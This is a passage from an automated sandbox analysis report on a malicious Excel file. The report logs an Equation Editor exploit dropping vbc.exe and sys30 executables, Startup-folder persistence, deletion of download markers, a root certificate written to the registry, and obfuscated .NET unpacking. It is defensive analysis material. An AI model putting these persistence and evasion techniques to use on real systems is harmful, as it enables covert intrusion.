Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\AppData\Local\sys4h57g\sys30.exe 'C:\Users\user\AppData\Local\sys4h57g\sys30.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\sys4h57g\sys30.exe C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Process created: C:\Users\user\AppData\Local\Temp\sys30s.exe 'C:\Users\user\AppData\Local\Temp\sys30s.exe'

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Enclosed.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVREC60.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@51/57@23/3

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\sys30s.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\{6618c428-0583-4059-a498-a8ec319ccd46}

Source: vbc.exe, 00000006.00000002.522085206.0000000006EB0000.00000002.00020000.sdmp, sys30.exe, 00000007.00000002.699599272.000000000CCB0000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

.NET source code contains potential unpacker

Source: vbc[1].exe.4.dr, Qm29/Lz41.cs	.Net Code: j6X System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: vbc.exe.4.dr, Qm29/Lz41.cs	.Net Code: j6X System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: sys30.exe.6.dr, Qm29/Lz41.cs	.Net Code: j6X System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 6.0.vbc.exe.d80000.0.unpack, Qm29/Lz41.cs	.Net Code: j6X System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 6.2.vbc.exe.d80000.1.unpack, Qm29/Lz41.cs	.Net Code: j6X System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 7.0.sys30.exe.1220000.0.unpack, Qm29/Lz41.cs	.Net Code: j6X System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 7.2.sys30.exe.1220000.3.unpack, Qm29/Lz41.cs	.Net Code: j6X System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 8.2.sys30.exe.1220000.1.unpack, Qm29/Lz41.cs	.Net Code: j6X System.Reflection.Assembly System.AppDomain::Load(System.Byte[])

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 6_2_00D8B27A push 00000000h; iretd	6_2_00D8B2C4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00D8CE66 push 00000000h; iretd	6_2_00D8CEB0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_0122CE66 push 00000000h; iretd	7_2_0122CEB0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 7_2_0122B27A push 00000000h; iretd	7_2_0122B2C4
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_0122CE66 push 00000000h; iretd	9_2_0122CEB0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_0122B27A push 00000000h; iretd	9_2_0122B2C4
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_0062B3E7 push edx; ret	9_2_0062B40A
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_0062B4D3 push ebx; ret	9_2_0062B4D6
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_0062B4D7 push ebx; ret	9_2_0062B4DA
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_0062B480 push edx; ret	9_2_0062B482
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Code function: 9_2_01020295 pushfd ; ret	9_2_01020296

Binary contains a suspicious time stamp

Source: sys30s.exe.7.dr

Static PE information: 0xC7142059 [Sun Nov 3 05:36:25 2075 UTC]

Source: vbc[1].exe.4.dr, Ed06/Qd84.cs	High entropy of concatenated method names: '.ctor', 'Kj0m', 'Re73', 't5L2', 'Lq73', 'Hb8r', 'Kz64', 'p8QT', 'q4D3', 'Bn3f'
Source: vbc.exe.4.dr, Ed06/Qd84.cs	High entropy of concatenated method names: '.ctor', 'Kj0m', 'Re73', 't5L2', 'Lq73', 'Hb8r', 'Kz64', 'p8QT', 'q4D3', 'Bn3f'
Source: sys30.exe.6.dr, Ed06/Qd84.cs	High entropy of concatenated method names: '.ctor', 'Kj0m', 'Re73', 't5L2', 'Lq73', 'Hb8r', 'Kz64', 'p8QT', 'q4D3', 'Bn3f'
Source: 6.0.vbc.exe.d80000.0.unpack, Ed06/Qd84.cs	High entropy of concatenated method names: '.ctor', 'Kj0m', 'Re73', 't5L2', 'Lq73', 'Hb8r', 'Kz64', 'p8QT', 'q4D3', 'Bn3f'
Source: 6.2.vbc.exe.d80000.1.unpack, Ed06/Qd84.cs	High entropy of concatenated method names: '.ctor', 'Kj0m', 'Re73', 't5L2', 'Lq73', 'Hb8r', 'Kz64', 'p8QT', 'q4D3', 'Bn3f'
Source: sys30s.exe.7.dr, Astronotplart/My/tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.cs	High entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
Source: sys30s.exe.7.dr, Astronotplart/My/nVdeDLHvVsfVxwgFzORDky8W3f9u4lGmiaWnSDb.cs	High entropy of concatenated method names: '.cctor', 'ipfF6OV8JHE8Qin24Sz2H', 'GBAU51HdoykwtyLJ8j', 'A6Cmw4VPbNKHMkR6BnXqjGTCsaLYYK', 'ZhXAveIVREq8oAgNFODqxTnhx35', 'TL13XiWxESQiImm09SkPUl2iIyfqvqfNa1eW0WN', 'hXlgWtIDkKwHkCLRcj1P0yvWMryPDm997zSDv', 'crnIowWf8YVTDoRdGn'
Source: sys30s.exe.7.dr, Astronotplart/gabKErPURPS76kDKjrme.cs	High entropy of concatenated method names: '.ctor', 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
Source: sys30s.exe.7.dr, Astronotplart/My/Resources/cZsjfbJLI2Nt8If5QOa3YzSXxDXbcmzUTY.cs	High entropy of concatenated method names: '7tuLHfXnvgcErulp', 'vFPZGqKub8S44KK9njyrAe1CN2qDJ3IQa7tiGW3Oebu', 'p0Rr9tY6YlifmwQtRmfPXGEDX', 'IPf8zIYNrroPiylxpRDezmMidW58Fr8mLO'
Source: sys30s.exe.7.dr, Astronotplart/rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.cs	High entropy of concatenated method names: '.ctor', 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
Source: 7.0.sys30.exe.1220000.0.unpack, Ed06/Qd84.cs	High entropy of concatenated method names: '.ctor', 'Kj0m', 'Re73', 't5L2', 'Lq73', 'Hb8r', 'Kz64', 'p8QT', 'q4D3', 'Bn3f'
Source: 7.2.sys30.exe.1220000.3.unpack, Ed06/Qd84.cs	High entropy of concatenated method names: '.ctor', 'Kj0m', 'Re73', 't5L2', 'Lq73', 'Hb8r', 'Kz64', 'p8QT', 'q4D3', 'Bn3f'
Source: 8.2.sys30.exe.1220000.1.unpack, Ed06/Qd84.cs	High entropy of concatenated method names: '.ctor', 'Kj0m', 'Re73', 't5L2', 'Lq73', 'Hb8r', 'Kz64', 'p8QT', 'q4D3', 'Bn3f'

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	File created: C:\Users\user\AppData\Local\Temp\sys30s.exe	Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Stores files to the Windows start menu directory

Source: C:\Users\Public\vbc.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sys30.lnk

Jump to behavior

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Users\Public\vbc.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sys30.lnk

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\Public\vbc.exe	File opened: C:\Users\Public\vbc.exe\:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	File opened: C:\Users\user\AppData\Local\sys4h57g\sys30.exe\:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exe	File opened: C:\Users\user\AppData\Local\sys4h57g\sys30.exe:Zone.Identifier read attributes \| delete

Stores large binary data to the registry

Source: C:\Users\Public\vbc.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
